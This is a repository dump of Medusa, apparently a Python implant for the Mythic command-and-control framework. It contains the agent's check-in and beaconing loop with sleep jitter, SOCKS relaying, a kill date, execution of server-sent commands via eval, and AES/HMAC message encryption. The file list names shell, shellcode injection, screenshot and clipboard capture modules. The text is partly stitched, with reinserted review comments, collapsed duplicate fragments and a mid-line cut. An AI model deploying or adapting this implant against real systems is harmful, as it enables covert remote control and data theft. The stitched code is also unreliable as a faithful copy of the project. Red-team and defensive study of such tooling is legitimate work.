Repository: MythicAgents/Medusa Branch: master Commit: 319866bf8e6d Files: 172 Total size: 440.9 KB Directory structure: gitextract_rqvfv1v_/ ├── .github/ │ ├── scripts/ │ │ └── matrix-test-builder.py │ └── workflows/ │ └── payload-build-matrix.yml ├── .gitignore ├── C2_Profiles/ │ └── .keep ├── Payload_Type/ │ └── medusa/ │ ├── Dockerfile │ ├── main.py │ ├── medusa/ │ │ ├── __init__.py │ │ ├── agent_code/ │ │ │ ├── base_agent/ │ │ │ │ ├── base_agent_core.py2 │ │ │ │ ├── base_agent_core.py3 │ │ │ │ ├── crypto_lib.py2 │ │ │ │ ├── crypto_lib.py3 │ │ │ │ ├── manual_crypto.py2 │ │ │ │ ├── manual_crypto.py3 │ │ │ │ ├── transport_azure_blob.py2 │ │ │ │ ├── transport_azure_blob.py3 │ │ │ │ ├── transport_http.py2 │ │ │ │ └── transport_http.py3 │ │ │ ├── cat.py │ │ │ ├── cd.py │ │ │ ├── clipboard.py2 │ │ │ ├── cp.py │ │ │ ├── cwd.py │ │ │ ├── download.py │ │ │ ├── download_bulk.py │ │ │ ├── env.py │ │ │ ├── eval_code.py │ │ │ ├── exit.py │ │ │ ├── jobkill.py │ │ │ ├── jobs.py │ │ │ ├── kill.py3 │ │ │ ├── list_apps.py2 │ │ │ ├── list_dlls.py3 │ │ │ ├── list_modules.py │ │ │ ├── list_tcc.py │ │ │ ├── load.py │ │ │ ├── load_dll.py │ │ │ ├── load_module.py2 │ │ │ ├── load_module.py3 │ │ │ ├── load_script.py │ │ │ ├── ls.py2 │ │ │ ├── ls.py3 │ │ │ ├── mv.py │ │ │ ├── pip_freeze.py │ │ │ ├── ps.py2 │ │ │ ├── ps.py3 │ │ │ ├── ps_full.py3 │ │ │ ├── rm.py │ │ │ ├── screenshot.py2 │ │ │ ├── shell.py │ │ │ ├── shinject.py │ │ │ ├── sleep.py │ │ │ ├── socks.py2 │ │ │ ├── socks.py3 │ │ │ ├── spawn_jxa.py │ │ │ ├── unload.py │ │ │ ├── unload_module.py │ │ │ ├── upload.py │ │ │ ├── vscode_list_recent.py │ │ │ ├── vscode_open_edits.py │ │ │ ├── vscode_watch_edits.py │ │ │ └── watch_dir.py │ │ └── mythic/ │ │ ├── __init__.py │ │ ├── agent_functions/ │ │ │ ├── __init__.py │ │ │ ├── builder.py │ │ │ ├── cat.py │ │ │ ├── cd.py │ │ │ ├── clipboard.py │ │ │ ├── cp.py │ │ │ ├── cwd.py │ │ │ ├── download.py │ │ │ ├── download_bulk.py │ │ │ ├── env.py │ │ │ ├── eval_code.py │ │ │ ├── exit.py │ │ │ 
├── jobkill.py │ │ │ ├── jobs.py │ │ │ ├── kill.py │ │ │ ├── list_apps.py │ │ │ ├── list_dlls.py │ │ │ ├── list_modules.py │ │ │ ├── list_tcc.py │ │ │ ├── load.py │ │ │ ├── load_dll.py │ │ │ ├── load_module.py │ │ │ ├── load_script.py │ │ │ ├── ls.py │ │ │ ├── mv.py │ │ │ ├── pip_freeze.py │ │ │ ├── ps.py │ │ │ ├── ps_full.py │ │ │ ├── rm.py │ │ │ ├── screenshot.py │ │ │ ├── shell.py │ │ │ ├── shinject.py │ │ │ ├── sleep.py │ │ │ ├── socks.py │ │ │ ├── spawn_jxa.py │ │ │ ├── unload.py │ │ │ ├── unload_module.py │ │ │ ├── upload.py │ │ │ ├── vscode_list_recent.py │ │ │ ├── vscode_open_edits.py │ │ │ ├── vscode_watch_edits.py │ │ │ └── watch_dir.py │ │ └── browser_scripts/ │ │ ├── copy_additional_info_to_clipboard.js │ │ ├── create_table.js │ │ ├── download.js │ │ ├── download_bulk.js │ │ ├── file_size_to_human_readable_string.js │ │ ├── jobs.js │ │ ├── list_apps.js │ │ ├── list_dlls.js │ │ ├── ls.js │ │ ├── ps.js │ │ ├── ps_full.js │ │ ├── screenshot.js │ │ ├── tcc.js │ │ ├── vscode_edits.js │ │ └── vscode_recent.js │ └── rabbitmq_config.json ├── README.md ├── config.json ├── documentation-c2/ │ └── .keep ├── documentation-payload/ │ ├── .keep │ └── medusa/ │ ├── _index.md │ ├── c2_profiles/ │ │ ├── Azure_Blob.md │ │ ├── HTTP.md │ │ └── _index.md │ ├── commands/ │ │ ├── _index.md │ │ ├── cat.md │ │ ├── cd.md │ │ ├── clipboard.md │ │ ├── cp.md │ │ ├── cwd.md │ │ ├── download.md │ │ ├── download_bulk.md │ │ ├── env.md │ │ ├── eval_code.md │ │ ├── exit.md │ │ ├── jobs.md │ │ ├── kill.md │ │ ├── list_apps.md │ │ ├── list_dlls.md │ │ ├── list_modules.md │ │ ├── list_tcc.md │ │ ├── load.md │ │ ├── load_dll.md │ │ ├── load_module.md │ │ ├── load_script.md │ │ ├── ls.md │ │ ├── mv.md │ │ ├── pip_freeze.md │ │ ├── ps.md │ │ ├── ps_full.md │ │ ├── rm.md │ │ ├── screenshot.md │ │ ├── shell.md │ │ ├── shinject.md │ │ ├── sleep.md │ │ ├── socks.md │ │ ├── spawn_jxa.md │ │ ├── unload.md │ │ ├── unload_module.md │ │ ├── upload.md │ │ ├── vscode_list_recent.md │ │ ├── 
#!/usr/bin/env python3
"""Emit the GitHub Actions build matrix covering every supported payload combo.

Writes ``matrix=<json>`` to ``$GITHUB_OUTPUT`` when running inside Actions,
otherwise prints the JSON to stdout.
"""
import json
import os
import pathlib
import re
import sys


def discover_profiles(base_agent_path: pathlib.Path):
    """Return the sorted C2 profile names that ship BOTH a .py2 and a .py3 transport.

    A profile is a file named ``transport_<name>.py2`` / ``transport_<name>.py3``
    under the base agent directory; only names present for both interpreter
    generations are considered buildable.
    """
    def _profile_names(suffix):
        # Collect the <name> capture for every transport_*.<suffix> file.
        pattern = re.compile(r"transport_(.+)\." + suffix + r"$")
        names = set()
        for candidate in base_agent_path.glob("transport_*." + suffix):
            hit = pattern.match(candidate.name)
            if hit:
                names.add(hit.group(1))
        return names

    return sorted(_profile_names("py2") & _profile_names("py3"))


def build_matrix(profiles):
    """Build the Actions ``matrix`` object: profile x interpreter x crypto impl."""
    python_versions = ("Python 2.7", "Python 3.8")
    crypto_impls = ("manual_crypto", "cryptography_lib")
    include = []
    for profile in profiles:
        for version in python_versions:
            for impl in crypto_impls:
                include.append(
                    {
                        "profile": profile,
                        "python_version": version,
                        "crypto_impl": impl,
                    }
                )
    return {"include": include}


def main():
    """Discover profiles relative to the repo root and emit the matrix JSON."""
    # This script lives at .github/scripts/, so the repo root is two levels up.
    repo_root = pathlib.Path(__file__).resolve().parents[2]
    base_agent = (
        repo_root / "Payload_Type" / "medusa" / "medusa" / "agent_code" / "base_agent"
    )
    payload = json.dumps(build_matrix(discover_profiles(base_agent)))

    output_file = os.environ.get("GITHUB_OUTPUT", "").strip()
    if output_file:
        # Inside GitHub Actions: append to the step-output file.
        with open(output_file, "a", encoding="utf-8") as handle:
            handle.write("matrix=" + payload + "\n")
    else:
        # Local/manual run: just print the JSON.
        sys.stdout.write(payload + "\n")


if __name__ == "__main__":
    main()
branches: - main push: branches: - dev permissions: contents: read concurrency: group: payload-build-matrix-${{ github.ref }} cancel-in-progress: true jobs: discover-combos: runs-on: ubuntu-latest outputs: matrix: ${{ steps.discover.outputs.matrix }} steps: - name: Checkout uses: actions/checkout@v4 - name: Setup Python uses: actions/setup-python@v5 with: python-version: "3.11" - name: Discover supported build combinations id: discover run: | python .github/scripts/matrix-test-builder.py build-matrix: needs: discover-combos runs-on: ubuntu-latest timeout-minutes: 15 strategy: fail-fast: false matrix: ${{ fromJSON(needs.discover-combos.outputs.matrix) }} steps: - name: Checkout uses: actions/checkout@v4 - name: Setup Python uses: actions/setup-python@v5 with: python-version: "3.11" - name: Run payload build tests for combo env: TEST_PROFILE: ${{ matrix.profile }} TEST_PYTHON_VERSION: ${{ matrix.python_version }} TEST_CRYPTO_IMPL: ${{ matrix.crypto_impl }} run: | python -m unittest tests/test_payload_build_matrix.py -v ================================================ FILE: .gitignore ================================================ *.DS_Store __pycache__/ ================================================ FILE: C2_Profiles/.keep ================================================ ================================================ FILE: Payload_Type/medusa/Dockerfile ================================================ FROM itsafeaturemythic/mythic_python_base:latest WORKDIR /Mythic/ CMD ["python3", "main.py"] ================================================ FILE: Payload_Type/medusa/main.py ================================================ import mythic_container import asyncio from medusa.mythic import * mythic_container.mythic_service.start_and_run_forever() ================================================ FILE: Payload_Type/medusa/medusa/__init__.py ================================================ ================================================ FILE: 
# Code-generation TEMPLATE for the Python 2 Medusa agent core.
# The ALL-CAPS bare tokens (TRANSPORT_IMPORTS, CRYPTO_HERE, TRANSPORT_CLASS_FIELDS,
# TRANSPORT_FUNCTIONS, AESPSK, TRANSPORT_CONFIG) and the markers UUID_HERE,
# killdate, encrypted_exchange_check, proxy_* and #COMMANDS_HERE are placeholders
# substituted by the Mythic builder at payload-build time; this file is NOT valid
# Python until then.
# NOTE(review): original formatting was lost in extraction. Indentation below is
# reconstructed on the assumption that the methods are spliced into the `medusa`
# class introduced by the CRYPTO_HERE substitution (crypto_lib.py2 /
# manual_crypto.py2 both start with `class medusa:`) — confirm against builder.py.
import os, random, sys, json, socket, base64, time, platform, ssl, getpass
from datetime import datetime
import threading
from Queue import Queue
TRANSPORT_IMPORTS
CHUNK_SIZE = 51200
CRYPTO_HERE
    def getOSVersion(self):
        # "macOS <version>" on Macs, otherwise "<system> <release>".
        if platform.mac_ver()[0]:
            return "macOS "+platform.mac_ver()[0]
        else:
            return platform.system() + " " + platform.release()
    def getUsername(self):
        # Prefer getpass; fall back to common environment variables.
        # Implicitly returns None if every lookup fails.
        try:
            return getpass.getuser()
        except:
            pass
        for k in [ "USER", "LOGNAME", "USERNAME" ]:
            if k in os.environ.keys():
                return os.environ[k]
    TRANSPORT_CLASS_FIELDS
    def formatMessage(self, data, urlsafe=False):
        # base64( callback-UUID + encrypted JSON body ). Falls back to the
        # payload UUID before the first successful check-in.
        # NOTE(review): when urlsafe=True the payload is encrypted twice (the
        # first b64encode result is discarded) — wasteful but harmless since a
        # fresh IV is used per encrypt() call.
        uuid_to_use = self.agent_config["UUID"]
        if uuid_to_use == "":
            uuid_to_use = self.agent_config["PayloadUUID"]
        output = base64.b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))
        if urlsafe:
            output = base64.urlsafe_b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))
        return output
    def formatResponse(self, data):
        # Strip the leading UUID from a decrypted server reply and parse the JSON.
        # Returns {} for an empty/whitespace-only body.
        uuid_to_use = self.agent_config["UUID"]
        if uuid_to_use == "":
            uuid_to_use = self.agent_config["PayloadUUID"]
        if isinstance(data, bytes):
            decoded = data.decode()
        else:
            decoded = data
        cleaned = decoded.replace(uuid_to_use, "")
        if not cleaned or cleaned.strip() == "":
            return {}
        return json.loads(cleaned)
    TRANSPORT_FUNCTIONS
    def sendTaskOutputUpdate(self, task_id, output):
        # Push partial (completed=False) output for a long-running task and
        # drain any piggybacked SOCKS packets from the reply.
        responses = [{ "task_id": task_id, "user_output": output, "completed": False }]
        message = { "action": "post_response", "responses": responses }
        response_data = self.postMessageAndRetrieveResponse(message)
        if "socks" in response_data:
            for packet in response_data["socks"]:
                self.socks_in.put(packet)
    def postResponses(self):
        # Batch all completed task results plus queued outbound SOCKS data into
        # one post_response, then drop tasks the server acknowledged.
        try:
            responses = []
            socks = []
            taskings = self.taskings
            for task in taskings:
                if task["completed"] == True:
                    out = { "task_id": task["task_id"], "user_output": task["result"], "completed": True }
                    if task["error"]:
                        out["status"] = "error"
                    # Attach structured payloads (process list / file browser)
                    # when the command produced them.
                    for func in ["processes", "file_browser"]:
                        if func in task:
                            out[func] = task[func]
                    responses.append(out)
            while not self.socks_out.empty():
                socks.append(self.socks_out.get())
            if ((len(responses) > 0) or (len(socks) > 0)):
                message = { "action": "post_response", "responses": responses }
                if socks:
                    message["socks"] = socks
                response_data = self.postMessageAndRetrieveResponse(message)
                # NOTE(review): [0] raises IndexError when a response is not
                # acknowledged with status "success"; the bare except below then
                # silently abandons the remaining acks until the next beacon.
                for resp in response_data["responses"]:
                    task_index = [t for t in self.taskings \
                        if resp["task_id"] == t["task_id"] \
                        and resp["status"] == "success"][0]
                    self.taskings.pop(self.taskings.index(task_index))
                if "socks" in response_data:
                    for packet in response_data["socks"]:
                        self.socks_in.put(packet)
        except:
            # Best-effort beacon: swallow transport/parse errors and retry on
            # the next loop iteration.
            pass
    def processTask(self, task):
        # Execute one tasking: the command name is resolved to a method on this
        # object and invoked with the JSON-decoded parameters.
        # NOTE(review): dispatch is done via eval() of a server-supplied command
        # string; getattr/callable gates it to existing attributes first.
        try:
            task["started"] = True
            function = getattr(self, task["command"], None)
            if(callable(function)):
                try:
                    params = json.loads(task["parameters"]) if task["parameters"] else {}
                    params['task_id'] = task["task_id"]
                    command = "self." + task["command"] + "(**params)"
                    output = eval(command)
                except Exception as error:
                    output = str(error)
                    task["error"] = True
                task["result"] = output
                task["completed"] = True
            else:
                task["error"] = True
                task["completed"] = True
                task["result"] = "Function unavailable."
        except Exception as error:
            task["error"] = True
            task["completed"] = True
            # NOTE(review): stores the exception OBJECT, unlike str(error) above.
            task["result"] = error
    def processTaskings(self):
        # Spawn one daemonless thread per not-yet-started task; threads are
        # never joined — completion is tracked via the task dict itself.
        threads = list()
        taskings = self.taskings
        for task in taskings:
            if task["started"] == False:
                x = threading.Thread(target=self.processTask, name="{}:{}".format(task["command"], task["task_id"]), args=(task,))
                threads.append(x)
                x.start()
    def getTaskings(self):
        # Pull every pending task (tasking_size -1 = all) and enqueue any
        # piggybacked SOCKS packets.
        data = { "action": "get_tasking", "tasking_size": -1 }
        tasking_data = self.getMessageAndRetrieveResponse(data)
        for task in tasking_data["tasks"]:
            t = { "task_id":task["id"], "command":task["command"], "parameters":task["parameters"], "result":"", "completed": False, "started":False, "error":False, "stopped":False }
            self.taskings.append(t)
        if "socks" in tasking_data:
            for packet in tasking_data["socks"]:
                self.socks_in.put(packet)
    def passedKilldate(self):
        # KillDate placeholder is substituted with "YYYY-MM-DD"; True once the
        # local clock reaches midnight of that date.
        kd_list = [ int(x) for x in self.agent_config["KillDate"].split("-")]
        kd = datetime(kd_list[0], kd_list[1], kd_list[2])
        if datetime.now() >= kd:
            return True
        else:
            return False
    def agentSleep(self):
        # Sleep for the configured interval plus a random jitter of up to
        # Jitter% of the interval.
        # assumes Sleep/Jitter have been substituted with numeric values by the
        # builder — TODO confirm.
        j = 0
        if int(self.agent_config["Jitter"]) > 0:
            v = float(self.agent_config["Sleep"]) * (float(self.agent_config["Jitter"])/100)
            if int(v) > 0:
                j = random.randrange(0, int(v))
        time.sleep(self.agent_config["Sleep"]+j)
    #COMMANDS_HERE
    def __init__(self):
        # Constructor doubles as the agent main loop: check in until the server
        # assigns a callback UUID, then beacon forever (get taskings, run them,
        # post results), honoring the kill date.
        self.socks_open = {}
        self.socks_in = Queue()
        self.socks_out = Queue()
        self.taskings = []
        self._meta_cache = {}
        self.moduleRepo = {}
        self.current_directory = os.getcwd()
        self.agent_config = {
            "PayloadUUID": "UUID_HERE",
            "UUID": "",
            "KillDate": "killdate",
            "enc_key": AESPSK,
            "ExchChk": "encrypted_exchange_check",
            "ProxyHost": "proxy_host",
            "ProxyUser": "proxy_user",
            "ProxyPass": "proxy_pass",
            "ProxyPort": "proxy_port",
            TRANSPORT_CONFIG
        }
        while True:
            if(self.agent_config["UUID"] == ""):
                self.checkIn()
                self.agentSleep()
            else:
                # Inner loop never exits back to the check-in branch; exit()
                # is expected to terminate the process.
                while True:
                    if self.passedKilldate():
                        self.exit(None)
                    try:
                        self.getTaskings()
                        self.processTaskings()
                        self.postResponses()
                    except:
                        pass
                    self.agentSleep()
if __name__ == "__main__":
    medusa = medusa()
task["error"]: out["status"] = "error" for func in ["processes", "file_browser"]: if func in task: out[func] = task[func] responses.append(out) while not self.socks_out.empty(): socks.append(self.socks_out.get()) if ((len(responses) > 0) or (len(socks) > 0)): message = { "action": "post_response", "responses": responses } if socks: message["socks"] = socks response_data = self.postMessageAndRetrieveResponse(message) for resp in response_data["responses"]: task_index = [t for t in self.taskings \ if resp["task_id"] == t["task_id"] \ and resp["status"] == "success"][0] self.taskings.pop(self.taskings.index(task_index)) if "socks" in response_data: for packet in response_data["socks"]: self.socks_in.put(packet) except: pass def processTask(self, task): try: task["started"] = True function = getattr(self, task["command"], None) if(callable(function)): try: params = json.loads(task["parameters"]) if task["parameters"] else {} params['task_id'] = task["task_id"] command = "self." + task["command"] + "(**params)" output = eval(command) except Exception as error: output = str(error) task["error"] = True task["result"] = output task["completed"] = True else: task["error"] = True task["completed"] = True task["result"] = "Function unavailable." 
except Exception as error: task["error"] = True task["completed"] = True task["result"] = error def processTaskings(self): threads = list() taskings = self.taskings for task in taskings: if task["started"] == False: x = threading.Thread(target=self.processTask, name="{}:{}".format(task["command"], task["task_id"]), args=(task,)) threads.append(x) x.start() def getTaskings(self): data = { "action": "get_tasking", "tasking_size": -1 } tasking_data = self.getMessageAndRetrieveResponse(data) for task in tasking_data["tasks"]: t = { "task_id":task["id"], "command":task["command"], "parameters":task["parameters"], "result":"", "completed": False, "started":False, "error":False, "stopped":False } self.taskings.append(t) if "socks" in tasking_data: for packet in tasking_data["socks"]: self.socks_in.put(packet) def passedKilldate(self): kd_list = [ int(x) for x in self.agent_config["KillDate"].split("-")] kd = datetime(kd_list[0], kd_list[1], kd_list[2]) if datetime.now() >= kd: return True else: return False def agentSleep(self): j = 0 if int(self.agent_config["Jitter"]) > 0: v = float(self.agent_config["Sleep"]) * (float(self.agent_config["Jitter"])/100) if int(v) > 0: j = random.randrange(0, int(v)) time.sleep(self.agent_config["Sleep"]+j) #COMMANDS_HERE def __init__(self): self.socks_open = {} self.socks_in = queue.Queue() self.socks_out = queue.Queue() self.taskings = [] self._meta_cache = {} self.moduleRepo = {} self.current_directory = os.getcwd() self.agent_config = { "PayloadUUID": "UUID_HERE", "UUID": "", "KillDate": "killdate", "enc_key": AESPSK, "ExchChk": "encrypted_exchange_check", "ProxyHost": "proxy_host", "ProxyUser": "proxy_user", "ProxyPass": "proxy_pass", "ProxyPort": "proxy_port", TRANSPORT_CONFIG } while True: if(self.agent_config["UUID"] == ""): self.checkIn() self.agentSleep() else: while True: if self.passedKilldate(): self.exit(None) try: self.getTaskings() self.processTaskings() self.postResponses() except: pass self.agentSleep() if __name__ == 
class medusa:
    def encrypt(self, data):
        # AES-256-CBC encrypt-then-MAC using the cryptography library.
        # Returns iv + ciphertext + HMAC-SHA256 tag over (iv + ciphertext),
        # or the plaintext unchanged when crypto is disabled or data is empty.
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import hashes, hmac, padding
        from cryptography.hazmat.backends import default_backend
        if self.agent_config["enc_key"]["value"] != "none" and len(data) > 0:
            key = base64.b64decode(self.agent_config["enc_key"]["enc_key"])
            iv = os.urandom(16)  # fresh random IV per message
            backend = default_backend()
            cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)
            encryptor = cipher.encryptor()
            padder = padding.PKCS7(128).padder()
            padded_data = padder.update(data) + padder.finalize()
            ct = encryptor.update(padded_data) + encryptor.finalize()
            h = hmac.HMAC(key, hashes.SHA256(), backend)
            h.update(iv + ct)
            # Renamed from `hmac`: the original rebinding shadowed the imported
            # cryptography hmac module within this function.
            tag = h.finalize()
            return iv + ct + tag
        else:
            return data

    def decrypt(self, data):
        # Verify the HMAC-SHA256 tag in constant time, then AES-256-CBC decrypt.
        # Wire layout: 36-byte UUID | 16-byte IV | ciphertext | 32-byte tag.
        # Returns "" on empty input or a bad tag; passes data straight through
        # (decoded) when crypto is disabled.
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import hashes, hmac, padding
        from cryptography.hazmat.backends import default_backend
        from cryptography.exceptions import InvalidSignature
        if self.agent_config["enc_key"]["value"] == "none":
            return data.decode()
        if len(data) == 0:
            return ""
        backend = default_backend()
        key = base64.b64decode(self.agent_config["enc_key"]["dec_key"])
        uuid = data[:36]
        iv = data[36:52]
        ct = data[52:-32]
        received_hmac = data[-32:]
        h = hmac.HMAC(key, hashes.SHA256(), backend)
        h.update(iv + ct)
        try:
            # Constant-time verification; the original compared base64-encoded
            # digests with ==, which leaks timing information.
            h.verify(received_hmac)
        except InvalidSignature:
            return ""
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)
        decryptor = cipher.decryptor()
        pt = decryptor.update(ct) + decryptor.finalize()
        unpadder = padding.PKCS7(128).unpadder()
        decrypted_data = unpadder.update(pt) + unpadder.finalize()
        return (uuid + decrypted_data).decode()
class medusa:
    def encrypt(self, data):
        # AES-256-CBC encrypt-then-MAC using the cryptography library.
        # Returns iv + ciphertext + HMAC-SHA256 tag over (iv + ciphertext),
        # or the plaintext unchanged when crypto is disabled or data is empty.
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import hashes, hmac, padding
        from cryptography.hazmat.backends import default_backend
        if self.agent_config["enc_key"]["value"] != "none" and len(data) > 0:
            key = base64.b64decode(self.agent_config["enc_key"]["enc_key"])
            iv = os.urandom(16)  # fresh random IV per message
            backend = default_backend()
            cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)
            encryptor = cipher.encryptor()
            padder = padding.PKCS7(128).padder()
            padded_data = padder.update(data) + padder.finalize()
            ct = encryptor.update(padded_data) + encryptor.finalize()
            h = hmac.HMAC(key, hashes.SHA256(), backend)
            h.update(iv + ct)
            # Renamed from `hmac`: the original rebinding shadowed the imported
            # cryptography hmac module within this function.
            tag = h.finalize()
            return iv + ct + tag
        else:
            return data

    def decrypt(self, data):
        # Verify the HMAC-SHA256 tag in constant time, then AES-256-CBC decrypt.
        # Wire layout: 36-byte UUID | 16-byte IV | ciphertext | 32-byte tag.
        # Returns "" on empty input or a bad tag; passes data straight through
        # (decoded) when crypto is disabled.
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import hashes, hmac, padding
        from cryptography.hazmat.backends import default_backend
        from cryptography.exceptions import InvalidSignature
        if self.agent_config["enc_key"]["value"] == "none":
            return data.decode()
        if len(data) == 0:
            return ""
        backend = default_backend()
        key = base64.b64decode(self.agent_config["enc_key"]["dec_key"])
        uuid = data[:36]
        iv = data[36:52]
        ct = data[52:-32]
        received_hmac = data[-32:]
        h = hmac.HMAC(key, hashes.SHA256(), backend)
        h.update(iv + ct)
        try:
            # Constant-time verification; the original compared base64-encoded
            # digests with ==, which leaks timing information.
            h.verify(received_hmac)
        except InvalidSignature:
            return ""
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)
        decryptor = cipher.decryptor()
        pt = decryptor.update(ct) + decryptor.finalize()
        unpadder = padding.PKCS7(128).unpadder()
        decrypted_data = unpadder.update(pt) + unpadder.finalize()
        return (uuid + decrypted_data).decode()
FILE: Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py2 ================================================ s_box = ( 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, ) inv_s_box = ( 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 0x08, 0x2E, 0xA1, 0x66, 
0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, ) def sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = s_box[s[i][j]] def inv_sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = inv_s_box[s[i][j]] def shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3] def inv_shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3] def add_round_key(s, k): for i in range(4): for j in range(4): s[i][j] ^= k[i][j] xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if 
